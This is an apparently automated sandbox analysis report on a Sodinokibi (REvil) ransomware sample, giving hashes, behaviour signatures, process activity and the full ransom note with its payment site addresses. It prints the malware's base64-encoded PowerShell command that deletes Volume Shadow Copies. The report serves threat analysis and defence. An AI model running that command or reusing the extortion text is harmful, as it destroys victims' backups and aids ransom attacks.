Overview

overview

10

Static

static

10

6628de7ffb...01.exe

windows7-x64

10

6628de7ffb...01.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 12:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe

  • Size

    166KB

  • MD5

    44c753ed1faec948b0d98bc9ba047469

  • SHA1

    1aa2d575752dcfa73ea8bd2fa666e18588be353c

  • SHA256

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01

  • SHA512

    f7d4c3988f82839264e83c1a17024c695bd8ff31a224eba3cfc9e3712758be5450521c1e52c246b02dad0849bdf381ad40d77e9b5bab6f8135f07219c13047e0

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QoIeXt5KCn16:ZJ0BXScFy2RsQJ8zg9edTn1

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\Users\elkl8r-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion elkl8r. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4502784476E21C0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B4502784476E21C0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: pjPn/MmzlxCI6TLT5m4Q6GBoI3A98lcrII1VEcAnmj3f185he7t0KHgIlmMK3VpU W87Mr5GWmBH6fGlvf286flCi0Kh7eg586mCza12n1osJh9Qy6yNp3GiHlnai1XkW 3Br14pVVzoJ0a+5u2Mpa+YIqM/+CKiiU/9mo5aFrP5kyOrAdyZLcWx5xfACZhzeN mm4xuMB61SnnP2bKglnCKILO2kz978kL4FJqUmR5GtQa5ehpgkgBKHXTQGt3bUvO DYjX/uzEu4Fm2+aIPyz/xmVGOUZ3hv8U6Ki0yxP6fAW1+xKyvb46ASSCiCLu73i6 LAxrvOb6B5GD6AHIJBL5vl6PsolRHqdDWLi+uBpTfeUhzmXnVJzpfPMLAil/9JKe e3Z2vIzHWyBNXLiz8N3rlERk4GL76yYhQidq59H7J368YV80w0TLyK0JsuFT1g/O lijk4Aw7gBo1Sq2mWZ5y0IB/+nuv5YZc70n5aQgRPKR7kUB+829MO0WA5Bfy1Q5S O+RdSn3GnmwLwg19NaNG4MvZ9WsKglBKz+1NSyKqQpfMx1XQcE0Xzlb1Xwf+r8BA 7OACR/R07r8hCN+StMO6meVeRw9RStnUUGFOpVaxjGxCngXETsQhSkHWxsTLn1Rr 9DlGm7scOwKVZ6z15tVnWe811//XYVdXKcYmYLT6Xa2yHwkHfuW8qpXnxaglLf4z cnBmEZB2VMSl5A8ayi+pDFh8UCNsQc1qvgS8IoeEBwyIjiRA9knRmf4Ql/XHUglD 7s32sETWJNjkV0KFSOw9a01Qk1KWQQjwNEnS9lUKkiV/3RBU3LdZojtkVmYVM75w G0fgKzDE1Ua2nXY0BhuCCGLJ+cC0BKrD0yZc1v9wbzrlRy3wdpku8SdIJsoLQcmE HCOXMOWVMz909v6TG4uVIP8tbHEawmDZcqmS+Rz1Yt42kzkOCQIKhpDjZGqAui0T PaMb+5qQ4Dh3fWRj8SR+szkigMpnU2f7y4wXbBSktaqrr/nUDK+z6KdINQmwMkJJ dfNtghzseVJWvbD98wqiQt6s0HIp6JbhPG5vI6Z/b6tlpVdLSQGD0qiC0Tlwo6+F NRVL05ml06leR4EtvjiV9BWetTlQIkYsKomGn6g9YCJ/CDKmGXQazbuz6MqjOWVx G6deCwHx7s2VbEgEBTfCW71BttTcgqHyDCOiIU5EuGmyVGy1qayFEhWkLk8QZt1h VEeeSIWHXK4e3fPpjb/65HRZl0rdcPCOWdpmX0rwroKTHG4LCh3J35Y5x6Gj7nfe u1ajLC87ySARtT7ptbeCvJb9Ie4SpS0xRp28gwEdYyTjL6J2BR4EptlyFXxW1Vln vOwftW9qzwjpEVpOwzwzeVZO2qVGvYdwOm9fBTOx Extension name: elkl8r ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4502784476E21C0

http://decryptor.cc/B4502784476E21C0

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe
    "C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1508
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3004
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\elkl8r-readme.txt
      Filesize

      6KB

      MD5

      30bcfc51ae1d4f7aadefb42fc9139fdb

      SHA1

      34345c4f5f1ec6e092d76849db7a76f659ccbb12

      SHA256

      2ebee9a206311782deab37d16fb761e1b87329e88fd3b98c16ae7be17d7443d3

      SHA512

      f1b720852be65201032c33306fca1fa91c7a678d3cf89dca09b422b262473c72aa8254048ab67170855593d06174d6fa709a74bcb92fb8174a0a6ffd523444fb

      Download Submit

    • memory/1508-4-0x000000001B490000-0x000000001B772000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1508-6-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1508-5-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1508-7-0x0000000002810000-0x0000000002890000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1508-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1508-10-0x0000000002810000-0x0000000002890000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1508-9-0x0000000002810000-0x0000000002890000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1508-11-0x0000000002810000-0x0000000002890000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1508-12-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

      Filesize

      9.6MB

      Download